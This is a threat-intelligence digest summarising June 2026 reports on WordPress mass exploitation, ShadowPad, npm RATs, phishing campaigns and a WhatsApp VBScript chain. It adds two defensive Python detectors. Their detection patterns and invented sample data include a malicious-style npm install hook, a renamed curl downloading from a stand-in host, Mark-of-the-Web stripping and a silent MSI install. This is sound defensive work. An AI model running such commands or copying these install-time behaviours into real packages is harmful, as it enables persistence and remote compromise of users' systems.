🔓CVEs: CVE-2025-6389 \[[Vulners](vulners.com/cve/CVE-2025-6…)]
- CVSS V3.1: *9.8*,
- Vulners: Exploitation: True
CVE-2026-1357 \[[Vulners](vulners.com/cve/CVE-2026-1…)]
- CVSS V3.1: *9.8*,
- Vulners: Exploitation: True
CVE-2025-13486 \[[Vulners](vulners.com/cve/CVE-2025-1…)]
- CVSS V3.1: *9.8*,
- Vulners: Exploitation: True
CVE-2026-6433 \[[Vulners](vulners.com/cve/CVE-2026-6…)]
- CVSS V3.1: *7.3*,
- Vulners: Exploitation: Unknown
CVE-2025-5394 \[[Vulners](vulners.com/cve/CVE-2025-5…)]
- CVSS V3.1: *9.8*,
- Vulners: Exploitation: True
CVE-2026-31843 \[[Vulners](vulners.com/cve/CVE-2026-3…)]
- CVSS V3.1: *9.8*,
- Vulners: Exploitation: Unknown
CVE-2026-1969 \[[Vulners](vulners.com/cve/CVE-2026-1…)]
- CVSS V3.1: *5.3*,
- Vulners: Exploitation: True
CVE-2026-4882 \[[Vulners](vulners.com/cve/CVE-2026-4…)]
- CVSS V3.1: *9.8*,
- Vulners: Exploitation: Unknown
CVE-2026-0740 \[[Vulners](vulners.com/cve/CVE-2026-0…)]
- CVSS V3.1: *9.8*,
- Vulners: Exploitation: True
CVE-2025-12057 \[[Vulners](vulners.com/cve/CVE-2025-1…)]
- CVSS V3.1: *9.8*,
- Vulners: Exploitation: True
CVE-2026-3844 \[[Vulners](vulners.com/cve/CVE-2026-3…)]
- CVSS V3.1: *9.8*,
- Vulners: Exploitation: True
CVE-2025-12352 \[[Vulners](vulners.com/cve/CVE-2025-1…)]
- CVSS V3.1: *9.8*,
- Vulners: Exploitation: Unknown
CVE-2025-23921 \[[Vulners](vulners.com/cve/CVE-2025-2…)]
- CVSS V3.1: *9.0*,
- Vulners: Exploitation: Unknown
CVE-2025-32432 \[[Vulners](vulners.com/cve/CVE-2025-3…)]
- CVSS V3.1: *10.0*,
- Vulners: Exploitation: True
Soft:
- craftcms craft_cms (<3.9.15, <4.14.15, <5.6.17)
CVE-2024-34102 \[[Vulners](vulners.com/cve/CVE-2024-3…)]
- CVSS V3.1: *9.8*,
- Vulners: Exploitation: True
Soft:
- adobe commerce (2.4.2, 2.4.3, 2.4.4, 2.4.5, 2.4.6)
- adobe commerce_webhooks (<1.5.0)
- adobe magento (2.4.4, 2.4.5, 2.4.6, 2.4.7)
CVE-2026-3300 \[[Vulners](vulners.com/cve/CVE-2026-3…)]
- CVSS V3.1: *9.8*,
- Vulners: Exploitation: True
CVE-2025-34085 \[[Vulners](vulners.com/cve/CVE-2025-3…)]
- CVSS V3.1: *Unknown*,
- Vulners: Exploitation: Unknown
CVE-2024-6648 \[[Vulners](vulners.com/cve/CVE-2024-6…)]
- CVSS V3.1: *7.5*,
- Vulners: Exploitation: Unknown
Soft:
- apollotheme ap_pagebuilder (<4.0.0)
CVE-2026-29014 \[[Vulners](vulners.com/cve/CVE-2026-2…)]
- CVSS V3.1: *9.8*,
- Vulners: Exploitation: True
Soft:
- metinfo (7.9, 8.0.0, 8.1)
CVE-2024-8856 \[[Vulners](vulners.com/cve/CVE-2024-8…)]
- CVSS V3.1: *9.8*,
- Vulners: Exploitation: True
Soft:
- revmakx backup_and_staging_by_wp_time_capsule (<1.22.22)
CVE-2024-2961 \[[Vulners](vulners.com/cve/CVE-2024-2…)]
- CVSS V3.1: *7.3*,
- Vulners: Exploitation: True
Soft:
- gnu glibc (<2.40)
- netapp active_iq_unified_manager (-)
- debian debian_linux (10.0)
CVE-2026-48907 \[[Vulners](vulners.com/cve/CVE-2026-4…)]
- CVSS V3.1: *9.8*,
- Vulners: Exploitation: True
Soft:
- widgetfactorylimited jce (<2.9.99.5)
CVE-2025-7852 \[[Vulners](vulners.com/cve/CVE-2025-7…)]
- CVSS V3.1: *9.8*,
- Vulners: Exploitation: Unknown
CVE-2025-7443 \[[Vulners](vulners.com/cve/CVE-2025-7…)]
- CVSS V3.1: *8.1*,
- Vulners: Exploitation: Unknown
CVE-2020-25213 \[[Vulners](vulners.com/cve/CVE-2020-2…)]
- CVSS V3.1: *10.0*,
- Vulners: Exploitation: True
Soft:
- filemanagerpro file_manager (<6.9)
📚TTPs:
⚔️Tactics: 9
🛠️Technics: 16
🧨IOCs:
- File: 17
- Url: 2
- Domain: 1
- IP: 2
- Hash: 9
💽Software: Wordpress, Linux, ThemeREX, BerqWP, WavePlayer, Joomla, WordPress ThemeREX, WordPress WavePlayer, WordPress BerqWP, ThinkPHP, ...
🔢Algorithms: base64, zip, md5, xor
📜Programming Languages: perl, javascript, python, php
💻Platforms: x86, x64, arm
#threatreport:
A mass web-exploitation operation, attributed to a Chinese actor, compromised thousands of WordPress sites in June 2026, as revealed by data exposed on the Hunt.io platform. This operation involved meticulous target acquisition, with over 850,000 recorded attempts against more than 442,000 vulnerability-site pairs, ultimately identifying 25,195 unique sites that exhibited confirmed or validated evidence of compromise.
The attack primarily focused on web applications, notably WordPress plugins, leveraging identified Common Vulnerabilities and Exposures (CVEs) to gain initial access. Key vulnerabilities exploited included arbitrary file uploads and remote code execution capabilities in widely used plugins such as Breeze Cache, ThemeREX Addons, and Gravity Forms, among others, along with various content management systems like Joomla and PrestaShop. Notable CVEs included CVE-2026-48907 (Joomla JCE), CVE-2026-31843 (Pay-UZ), and CVE-2025-7852 (WPBookit), which facilitated the unauthorized exploitation of these platforms.
The threat actor's initial-compromise tooling followed a consistent pattern: upload a malicious PHP file disguised as legitimate content (for example, an image), trigger command execution through file-handler functions, and automate the process with custom exploitation tools. A variety of post-exploitation techniques were employed, including the installation of web shells and the fetching of attacker-controlled files. The primary web shell identified, named "down.php," offered complete system control, arbitrary command execution, and extensive file management functions.
Tooling leveraged by the actor included custom scripts to adjust parameters in various exploit development frameworks and exploitation routines to maximize the efficiency of their scanning processes. This involved modifications to enhance threading parameters and to refine the search patterns for detecting vulnerabilities. The actors also maintained comprehensive logs of their activities, providing insights into their operational tempo and methodologies.
Attribution of the campaign rests on linguistic analysis of the recovered scripts, which contain fluent Simplified Chinese, indicating a Chinese-speaking actor. The operational methods and toolsets suggest affiliations with groups known to deploy similar tactics. The use of FOFA for reconnaissance and of the Godzilla webshell for persistent access underscores the sophisticated nature of this attack.
In summary, this cyber operation showcases the exploitation of widely-known vulnerabilities across multiple web platforms, with a clear emphasis on WordPress plugins and prominent content management systems, revealing persistent threats to web security and the need for vigilance against similar mass exploitation attempts.


#threatreport #MediumCompleteness
The Growing Threat of ShadowPad Malware and Its Business Impact | 24-06-2026
Source: cyberint.com/blog/dark-web/…
Key details below ↓
🧑💻Actors/Campaigns:
Winnti
💀Threats:
Shadowpad, Plugx_rat, Supply_chain_technique, Shadowhammer, Spear-phishing_technique, Lolbin_technique, Watering_hole_technique, Dll_sideloading_technique, Passthehash_technique, Process_injection_technique,
🎯Victims: Government institutions, Critical infrastructure, High value corporate assets, Enterprise software
🏭Industry: Critical_infrastructure, Government
🌐Geo: Chinese
📚TTPs:
⚔️Tactics: 8
🛠️Technics: 20
🧨IOCs:
- IP: 34
- Hash: 6
💽Software: NetSarang
🔢Algorithms: sha256
📜Programming Languages: powershell
#threatreport:
ShadowPad malware, initially attributed to the Chinese state-sponsored group APT41, has become a notable threat in the cybersecurity landscape due to its modular and customizable architecture. First identified in 2015 as an evolution of PlugX, ShadowPad is now utilized by various APT groups, reflecting its versatility in executing malicious operations like data exfiltration, lateral movement, and establishing backdoors into infected systems. Its modularity allows the malware to adapt to specific targets, highlighting its capability for stealth and persistence.
The delivery mechanisms for ShadowPad are complex and varied, often employing sophisticated strategies designed to exploit specific vulnerabilities. It can be distributed through software supply chain attacks, wherein attackers compromise updates of legitimate applications, thus exploiting the trust users place in vendors. Additionally, the malware is utilized in conjunction with unpatched vulnerabilities within enterprise software, including zero-day exploits, which provide attackers with a gateway to infiltrate networks. Spear-phishing campaigns further facilitate the spread of ShadowPad, using well-crafted emails containing malicious links or attachments that execute the malware upon interaction. Moreover, operators utilize Living-off-the-Land (LotL) techniques by leveraging existing administrative tools and scripts, such as PowerShell and Windows Management Instrumentation (WMI), which helps avoid detection by security systems. Watering hole attacks also serve as a vehicle for distribution, targeting websites frequented by desired victims to serve the malware inadvertently.
The ramifications of deploying ShadowPad can be severe for organizations, leading to significant data breaches characterized by the exfiltration of sensitive information, operational disruptions, espionage activities, and substantial financial losses. The malware’s capabilities lend themselves to stealing intellectual property and customer data, which may be used for espionage or sold on illicit markets. Furthermore, the operational impact can lead to downtime and loss of productivity, as well as the installation of additional payloads that disrupt critical systems. Organizations face the prospect of costly incident response, system recovery efforts, and potential regulatory fines for data breaches that can also incur reputational damage. The public exposure of such incidents may diminish customer trust and market value, resulting in long-term consequences for affected entities.


#threatreport #MediumCompleteness
MYRA: A Full Linux RAT Distributed via npm | 23-06-2026
Source: safedep.io/malicious-apin…
Key details below ↓
💀Threats:
Myra, Supply_chain_technique, Process_injection_technique, Nop_sled_technique,
🎯Victims: Software development, Linux systems, Npm users
🌐Geo: Polish
📚TTPs:
⚔️Tactics: 2
🛠️Technics: 0
🤖LLM extracted TTPs:
T1014, T1036.005, T1053.003, T1055.008, T1059.004, T1095, T1113, T1195.001, T1548.003, T1564.001, ...
🧨IOCs:
- IP: 2
- Email: 1
- File: 12
💽Software: Linux, Node.js, systemd, curl, Ubuntu, sudo
🔢Algorithms: sha256, base64
🔠Functions: readFileSync, createHmac, persistStealthPreload, writeFileSync, persistStealthCron, persistStealthProfile, findDesktopProcessEnv, readProcEnviron
📜Programming Languages: javascript, python
#threatreport:
A full-featured Linux remote access Trojan (RAT) named MYRA has been distributed via an npm package titled "apintergrationpost." Despite the author's claimed purpose of facilitating authorized red team exercises and EDR validation, MYRA exhibits significant malicious capabilities. Upon installation, it compiles a native C rootkit, establishes three persistence mechanisms, masquerades as a legitimate system service, and executes filelessly. The RAT also provides interactive shell access and streams captures from the infected system. The default command and control (C2) configuration points to a private IP address (192.168.54.1), indicating a focused targeting strategy.
The installation process is initiated through three npm lifecycle scripts. The 'prepare' script compiles the rootkit by generating C binaries and shared libraries essential for the RAT's evasion tactics and persistence. The 'preinstall' script forces root privileges, ensuring that the attacker has full access to system-level resources and can install necessary system dependencies. Upon successful installation, the 'postinstall' script launches the RAT in a detached background process, rendering it independently operational from npm.
The MYRA RAT employs a plugin architecture with 13 modules for its C2 framework, utilizing TCP for communication and requiring HMAC-SHA256 authentication. Notably, the use of a private IP for the C2 server suggests its deployment in a defined network environment rather than using common public domains seen in typical malware distributions. The native rootkit contains sophisticated components such as 'libcache.so' for file hiding via LD_PRELOAD, 'proc_hide' for process masquerading, and 'memfd_exec' and 'memfd_loader' for executing the RAT entirely from memory, thus leaving no traces on disk.
Persistence is achieved through three distinct mechanisms: the LD_PRELOAD file-hiding rootkit, a cron job that triggers every 13 minutes to run the RAT, and a login hook via profile.d that executes a wrapper script utilizing the most covert execution method available. These vectors collectively ensure that the RAT remains active even after system reboots or user intervention attempts.
As the RAT was developed within a VMware environment, the codebase of MYRA includes telemetry and various MITRE ATT&CK techniques, pointing towards a scenario for red team testing rather than actual deployment into the wild. However, the publication of MYRA into a public npm registry poses grave risks, as it allows unauthorized users access to a potent toolkit that aggregates well-known evasion techniques. The combination of these sophisticated tactics within a single package presents an alarming threat landscape for defenders, reinforcing the need for cautious evaluation of npm packages before installation.
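The three install-time behaviours the post singles out (the prepare hook compiling native code, preinstall demanding root, postinstall detaching a background process) are all visible in package.json before anything runs, which is the point at which the "cautious evaluation" above can actually happen. The following is an added example, not code from the RST Cloud post or the SafeDep report: a small audit that reads a package.json, inspects only the hooks npm executes automatically during install, and matches them against a handful of indicators. The package.json is constructed to mirror the described behaviour; its name and script bodies are invented for illustration and are not the real package's contents.

```python
"""Audit an npm package.json for install-time lifecycle scripts.

Added example, not code from the RST Cloud post or the SafeDep report.  The
package.json below is constructed to mirror the behaviour the post describes
(prepare compiles native code, preinstall demands root, postinstall detaches a
background process); the package name and script bodies are invented and are
not the real package's contents.
"""
import json
import re

# Hooks npm runs on its own during `npm install`, without the user asking for them.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare", "prepublish")

# (pattern, why it matters).  Each entry is one distinct indicator.
SUSPICIOUS = [
    (re.compile(r"\b(gcc|cc|clang|make|tcc)\b"),                  "compiles native code at install time"),
    (re.compile(r"\bsudo\b|\bid -u\b|\$EUID|\$\(id -u\)"),         "checks for or demands root privileges"),
    (re.compile(r"\b(curl|wget)\b"),                                "downloads content during install"),
    (re.compile(r"\b(nohup|setsid|disown)\b|&\s*$|&\s*;"),         "detaches a background process"),
    (re.compile(r"LD_PRELOAD|crontab|/etc/profile\.d|\.bashrc"),   "touches a persistence location"),
    (re.compile(r"\bnode\s+-e\b|eval\(|Buffer\.from\(.*base64"),   "runs inline or encoded code"),
]


def audit_scripts(package_json: str) -> dict[str, list[str]]:
    """Return {hook: [indicator, ...]} for every install-time hook present.

    A hook that exists but matches nothing still appears (with an empty list):
    any automatic install script deserves a look, not only the ones we pattern-match.
    """
    pkg = json.loads(package_json)
    scripts = pkg.get("scripts") or {}
    findings: dict[str, list[str]] = {}
    for hook in INSTALL_HOOKS:
        body = scripts.get(hook)
        if body is None:
            continue
        findings[hook] = [why for pat, why in SUSPICIOUS if pat.search(body)]
    return findings


def verdict(findings: dict[str, list[str]]) -> str:
    """'block' when two or more distinct indicators appear across the hooks
    (the combination is the signal), 'review' when any install hook exists
    at all, 'ok' when the package runs nothing during install."""
    distinct = {why for hits in findings.values() for why in hits}
    if len(distinct) >= 2:
        return "block"
    return "review" if findings else "ok"


# Constructed package.json (placeholder name, invented script bodies).
CONSTRUCTED_PACKAGE = json.dumps({
    "name": "example-package",
    "version": "1.0.0",
    "scripts": {
        "prepare": "gcc -shared -fPIC -o native/libhelper.so native/helper.c",
        "preinstall": "[ \"$(id -u)\" -eq 0 ] || { echo 'run with sudo'; exit 1; }",
        "postinstall": "nohup node agent.js > /dev/null 2>&1 &",
        "test": "node test.js",
    },
})

if __name__ == "__main__":
    found = audit_scripts(CONSTRUCTED_PACKAGE)
    for hook, hits in found.items():
        print(f"{hook}: {', '.join(hits) or 'no indicator matched'}")
    print("verdict:", verdict(found))
```

The audit deliberately ignores `test`, `build` and other scripts that only run when invoked by name; the risk the post describes comes from hooks that execute as a side effect of `npm install`. Pair it with `npm install --ignore-scripts` for anything that lands in "review" or "block" so the package contents can be read before any hook runs.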


#tireport #ExtractedDiagrams
The key diagram for the report (ML Classifier):
schema: 1, code: 6


#threatreport #HighCompleteness
An Income Tax Assessment Notice Phishing Campaign Delivering Malware | 23-06-2026
Source: cyfirma.com/research/an-in…
Key details below ↓
💀Threats:
Confuserex_tool, Dll_sideloading_technique, Xworm_rat, Spear-phishing_technique,
🎯Victims: Users in india, Organizations in india
🏭Industry: Government
🌐Geo: Indian, Hong kong, China, India
📚TTPs:
⚔️Tactics: 8
🛠️Technics: 22
🧨IOCs:
- Domain: 1
- File: 2
- IP: 3
- Hash: 8
🔢Algorithms: zip, sha256, md5
🔠Functions: SetAutoRun, GetWindowsVersion, GetIdleTime
🗂️Win API: DllEntry, GetSecurityInfo
YARA: Found
#threatreport:
A recent malware campaign identified by CYFIRMA leverages a fraudulent Indian Income Tax Department-themed phishing lure to deliver a sophisticated Remote Access Trojan (RAT)-like payload. The attack primarily utilizes a phishing website hosted on the domain harivo.vip, designed to mimic authentic government communication, thus enticing victims to download malicious software masquerading as an official tax assessment notification. The lure incorporates legal language and compliance urgency to enhance its believability, prompting users to download a ZIP archive titled Tax_Assessment_0609.zip.
Upon extraction, this archive reveals a malicious disk image file named Tax_Assessment.img, which contains multiple malware components including a Portable Executable (PE) file (Tax_Assessment.exe) that acts as a loader and a DLL (libsvcs.dll). Technical analysis shows that Tax_Assessment.exe employs .NET reflection to dynamically load the DLL, thereby obscuring its malicious intent and complicating static analysis attempts. Both components were obfuscated using ConfuserEx, further complicating detection and making reverse engineering challenging.
The payload, libsvcs.dll, exhibits typical RAT functionalities, including methods for establishing persistent backdoor access, gathering system information, and enabling remote command execution via encrypted communications. The binary is configured to connect to a hardcoded Command-and-Control (C2) server located at 103.231.12.27:4444, utilizing an embedded 32-byte encryption key for secure communication.
The threat actors behind this campaign are assessed to be financially motivated, utilizing social engineering tactics to deceive targets. The operational design reflects a structured infection methodology with multiple stages of payload delivery, maximizing flexibility while minimizing detection risks. This includes the use of misleading documents as well as techniques that hide execution behaviors and modify system registries.
While the C2 infrastructure geolocates to Hong Kong, it is critical to note that such information does not definitively indicate the threat actors' origins, as adversaries often use compromised systems and third-party hosting to obscure their tracks. Despite the suggestive regional indicators, comprehensive attribution remains undetermined.
Organizations are urged to enhance monitoring capabilities against tax-themed phishing attempts, fortify security measures around executable files, and improve detection mechanisms for suspicious behaviors associated with loader and DLL operations, particularly in response to newly observed communications and potentially malicious infrastructure.


#threatreport #MediumCompleteness
From PostCSS Masquerading to Windows RAT | 23-06-2026
Source: research.jfrog.com/post/from-post…
Key details below ↓
🎯Victims: Javascript build ecosystem, Software development, Open source software ecosystem
📚TTPs:
⚔️Tactics: 3
🛠️Technics: 0
🤖LLM extracted TTPs:
T1005, T1047, T1057, T1059, T1059.001, T1059.005, T1059.007, T1071.001, T1082, T1105, ...
🧨IOCs:
- File: 18
- Command: 1
- Domain: 1
- Url: 2
- IP: 1
- Hash: 6
💽Software: Chrome, curl, Nuitka, virtualbox, qemu, hyper-v, vmwaretray
🔢Algorithms: md5, aes-256-gcm, rc4, aes, gzip, zip, chacha20-poly1305
🗂️Win API: COMMAND0825INFORMATION, COMMAND0825AUTO, MSG0825LOG, NCryptOpenStorageProvider, NCryptOpenKey, NCryptDecrypt, SeDebugPrivilege
📜Programming Languages: javascript, powershell, python
#threatreport:
The investigation into a malicious package masquerading as the legitimate postcss-selector-parser highlights a sophisticated attack leveraging the JavaScript package ecosystem. This attack facilitates the deployment of a Windows Remote Access Trojan (RAT) that is capable of various malicious activities, including remote shell capabilities, file transfers, persistence mechanisms, host profiling, and the theft of Chrome credentials. The impersonation relies on the popularity of postcss-selector-parser, which reports over 150 million weekly downloads, to social-engineer unsuspecting users.
The malware employs a layered architecture with dependencies on seemingly benign packages like aes-decode-runner-pro and postcss-minify-selector-parser. Once decoded, these packages yield a PowerShell downloader that starts the payload chain by fetching additional malicious components from command-and-control (C2) infrastructure. The PowerShell script downloads a Windows payload from the domain nvidiadriver.net, extracts it to the %TEMP% directory, and executes a VBS bootstrapper, which deploys the malware further.
Analyzing the payload reveals it operates through HTTP C2 communications, employing encrypted POST packets. It uses RC4/ARC4 for packet transport, integrating MD5 checksums for integrity. Persistence is maintained through the Windows Registry, dynamically collecting victim UUIDs and monitoring host actions, including machine checks to discern whether the malware is running in a virtual machine or a physical environment.
The malware is partitioned into multiple modules, such as config.pyd, api.pyd, and audiodriver.pyd, each focusing on distinct functionalities. The command dispatcher is crucial for orchestrating operations, managing the encrypted messaging to the C2 server, and executing the requested commands. Notably, the auto.pyd module is particularly concerning as it is responsible for Chrome credential theft, referencing essential Chrome profile files and utilizing Windows decryption APIs to facilitate access to saved logins.
Furthermore, the command.pyd module not only executes commands but also conducts profiling of the host environment to evade detection. It implements checks through Windows Management Instrumentation (WMI), process listings, and other indicators to ascertain if it is sandboxed within a virtualized setup.
In summary, this incident illustrates a targeted package-impersonation attack that aims to exploit trust within the npm ecosystem. The real threat materializes after the initial payload is decoded, leading to robust malicious capabilities including extensive data theft and system compromise.


#threatreport #LowCompleteness
Extended Rapid Response: Zimperium's On-Device Coverage of the EvilTokens Multi-Brand Phishing Campaign | 23-06-2026
Source: zimperium.com/blog/extended-…
Key details below ↓
💀Threats:
Eviltokens_tool, Device_code_phishing_technique,
🎯Victims: Microsoft 365 users, Mobile users
🤖LLM extracted TTPs:
T1528, T1550.001, T1566.002, T1583.006
🔢Algorithms: aes-gcm
#threatreport:
The EvilTokens campaign represents a notable evolution in phishing tactics, utilizing a Phishing-as-a-Service (PhaaS) model that specifically targets users of Microsoft 365. This attack vector is marked by its sophisticated integration of device-code phishing, which allows it to operate under the guise of trusted brands like DocuSign and Adobe. Through the use of disposable Cloudflare Workers infrastructure, the campaign effectively circumvents standard security measures, making traditional static blocklisting approaches less effective against it.
A critical characteristic of the EvilTokens campaign is its ability to bypass both password and multi-factor authentication (MFA). Attackers exploit the legitimate Microsoft page for device approval, enabling victims to unknowingly approve the malicious device. This approach is particularly concerning as it leverages stolen refresh tokens, granting persistent access to attackers that remains viable even after victims reset their passwords. The campaign's impact is magnified by its focus on mobile devices, which are increasingly used to open phishing links. Mobile devices typically have weaker endpoint security controls, making them more susceptible to these types of attacks.
In response to these threats, Zimperium’s Mobile Threat Defense (MTD) solution has been effective in detecting and blocking the malicious URLs associated with EvilTokens at the mobile device level. This preemptive measure stops users from reaching the critical phishing step where device codes are entered. Moreover, ongoing research has led to the identification of numerous new domains associated with the EvilTokens phishing kit, indicating a broader compromise landscape. Indicators of compromise (IOCs) related to these domains are publicly accessible for further investigation, enabling organizations to strengthen their defenses against such sophisticated phishing threats.


#tireport #ExtractedDiagrams
The key diagram for the report (ML Classifier):
windows: 1, schema: 1


#threatreport #MediumCompleteness
WhatsApp VBScript Campaign Installs ManageEngine Endpoint Central for Persistent Remote Access | 23-06-2026
Source: socradar.io/blog/whatsapp-…
Key details below ↓
💀Threats:
Bitsadmin_tool, Motw_bypass_technique, Gh0st_rat, Valleyrat,
🎯Victims: Consumers, Organizations
🌐Geo: Malaysia, Spain, French, Mexico, Australia, Vietnam, Brazil, India, Taiwan, Russia, Chinese, German, Singapore, Portuguese
📚TTPs:
⚔️Tactics: 1
🛠️Technics: 0
🤖LLM extracted TTPs:
T1027, T1036, T1036.008, T1059.005, T1105, T1112, T1218.007, T1219, T1548.002, T1553.005, ...
🧨IOCs:
- File: 12
- IP: 6
💽Software: WhatsApp, curl
🔢Algorithms: zip
📜Programming Languages: powershell, vbscript
#threatreport:
The WhatsApp VBScript campaign represents a socially engineered cyber attack wherein attackers distribute a malicious VBScript payload through hijacked WhatsApp accounts. This campaign targets a broad range of victims across multiple countries, with a notable concentration in Malaysia, which accounts for around 80% of reported incidents. The attackers seek to install ManageEngine Endpoint Central, a legitimate enterprise remote management tool, to maintain persistent control over compromised systems by exploiting the common use of WhatsApp for communication in corporate environments.
The initial stage of the attack involves using obfuscation techniques to make the VBScript payload appear benign. Attackers employ localized filenames and Windows Update-themed comments to trick users into executing the scripts. The VBScript can obfuscate its operations through methods like string concatenation, encoded content, and mimicking legitimate Windows utilities such as curl or bitsadmin, which are renamed and used to fetch additional malicious payloads.
In the second stage, the attack escalates as the script creates a randomized hidden directory within the system, facilitating the download of a ZIP file containing further scripts. By leveraging various methods including PowerShell and curl, the attacker extracts and executes these scripts while attempting to remove metadata that may trigger security warnings.
The final stage involves the silent installation of the ManageEngine Endpoint Central agent, allowing adversaries to perform remote administration without triggering typical red flags associated with malicious binaries. Although the campaign exhibits certain characteristics that may suggest the involvement of a Chinese-speaking threat actor, no definitive attribution has been established. The presence of certain IP addresses previously linked to other malware families does not conclusively identify a single operator.
This campaign raises new challenges for cybersecurity teams, as it blurs the lines between legitimate software and malicious activity, complicating detection and response efforts. Detection strategies should focus on unusual executions of wscript.exe, suspicious directory creations, and the monitoring of registry writes associated with privilege escalation. It is vital to impose network controls to block known malicious domains and scrutinize unexpected outbound connections to storage services frequently used for hosting payloads.
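The detection points listed above (script-host executions, suspicious directory creation, renamed curl/bitsadmin, metadata stripping, a silent installer) map cleanly onto process-creation telemetry. The following is an added example, not code from the RST Cloud post or the SOCRadar report: detection logic for that chain, run over constructed Sysmon-style process-creation records. Field names follow Sysmon Event ID 1 (Image, CommandLine, ParentImage, OriginalFileName); the user name, directory names, file names, command lines and the `files.example.invalid` host are constructed for illustration, and the assumption that a renamed curl.exe or bitsadmin.exe keeps its OriginalFileName in PE version info is noted in the code.

```python
"""Detection logic for the WhatsApp VBScript chain, run over constructed
Sysmon-style process-creation (Event ID 1) records.

Added example, not code from the RST Cloud post or the SOCRadar report.  Field
names follow Sysmon (Image, CommandLine, ParentImage, OriginalFileName); the
paths, file names, command lines and host names are constructed.
"""
from dataclasses import dataclass
from pathlib import PureWindowsPath
import re


@dataclass(frozen=True)
class ProcessEvent:
    image: str               # Sysmon: Image
    command_line: str        # Sysmon: CommandLine
    parent_image: str        # Sysmon: ParentImage
    original_file_name: str  # Sysmon: OriginalFileName (PE version info)


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# LOLBins the post says were renamed.  Assumption: renaming the file on disk
# leaves the PE version-info OriginalFileName intact, which Sysmon reports.
RENAME_WATCH = {"curl.exe", "bitsadmin.exe"}
USER_WRITABLE = re.compile(r"c:\\users\\[^\\]+\\(downloads|appdata\\local\\temp|desktop)\\", re.I)


def _name(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def _random_appdata_dir(cmd: str) -> bool:
    """True if the command line references AppData\\Local\\<name> where <name>
    looks randomised: 8+ alphanumerics mixing letters and digits.  The mixing
    requirement keeps vendor folders such as 'Microsoft' out."""
    for m in re.finditer(r"\\appdata\\local\\([a-z0-9]{8,})\\", cmd, re.I):
        name = m.group(1)
        if any(c.isdigit() for c in name) and any(c.isalpha() for c in name):
            return True
    return False


def detect(ev: ProcessEvent) -> list[str]:
    """Return every rule this event matches (empty list == nothing to report)."""
    alerts = []
    img = _name(ev.image)
    parent = _name(ev.parent_image)
    cmd = ev.command_line
    # Stage 1: a script host running a .vbs straight out of a user-writable path.
    if img in SCRIPT_HOSTS and USER_WRITABLE.search(cmd) and re.search(r"\.vbs\b", cmd, re.I):
        alerts.append("script host running .vbs from user-writable path")
    # Renamed LOLBin: file name on disk no longer matches the PE's own name.
    ofn = ev.original_file_name.lower()
    if ofn in RENAME_WATCH and img != ofn:
        alerts.append(f"renamed {ofn} executing as {img}")
    # Stage 2: Mark-of-the-Web stripped from the downloaded content.
    if img in {"powershell.exe", "pwsh.exe"} and re.search(r"Unblock-File|Zone\.Identifier", cmd, re.I):
        alerts.append("Mark-of-the-Web removal from script")
    # Stage 3: quiet MSI install launched from a script host or PowerShell.
    if img == "msiexec.exe" and re.search(r"/q[nb]?\b|/quiet", cmd, re.I) \
            and parent in SCRIPT_HOSTS | {"powershell.exe"}:
        alerts.append("silent MSI install spawned by a script host")
    # Any child of a script host working inside a randomised AppData directory.
    if parent in SCRIPT_HOSTS and _random_appdata_dir(cmd):
        alerts.append("script host child using randomised AppData directory")
    return alerts


# Constructed events, in the order the post describes the stages, plus one benign curl.
EVENTS = [
    ProcessEvent(r"C:\Windows\System32\wscript.exe",
                 r'wscript.exe "C:\Users\bob\Downloads\WhatsApp\Windows_Update.vbs"',
                 r"C:\Windows\explorer.exe", "wscript.exe"),
    ProcessEvent(r"C:\Users\bob\AppData\Local\x7k2m9qd\svch.exe",
                 r'"C:\Users\bob\AppData\Local\x7k2m9qd\svch.exe" -s -o pkg.zip https://files.example.invalid/pkg.zip',
                 r"C:\Windows\System32\wscript.exe", "curl.exe"),
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r'powershell.exe -nop -w hidden -c "Expand-Archive C:\Users\bob\AppData\Local\x7k2m9qd\pkg.zip '
                 r'C:\Users\bob\AppData\Local\x7k2m9qd; Get-ChildItem C:\Users\bob\AppData\Local\x7k2m9qd | Unblock-File"',
                 r"C:\Windows\System32\wscript.exe", "PowerShell.EXE"),
    ProcessEvent(r"C:\Windows\System32\msiexec.exe",
                 r'msiexec.exe /i "C:\Users\bob\AppData\Local\x7k2m9qd\agent.msi" /qn',
                 r"C:\Windows\System32\wscript.exe", "msiexec.exe"),
    ProcessEvent(r"C:\Windows\System32\curl.exe",
                 r"curl.exe -s https://www.example.invalid/",
                 r"C:\Windows\System32\cmd.exe", "curl.exe"),
]

if __name__ == "__main__":
    for ev in EVENTS:
        for a in detect(ev):
            print(f"{_name(ev.image)} <- {_name(ev.parent_image)}: {a}")
```

Each of the four malicious records fires at least one rule, and the renamed-binary rule fires without any reference to the file name the attacker chose, because it compares against the PE's own OriginalFileName; the legitimate System32 curl run produces nothing. Correlating the alerts on the parent wscript.exe process GUID is the natural next step in a SIEM, since the post's point is that no single stage looks malicious on its own.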
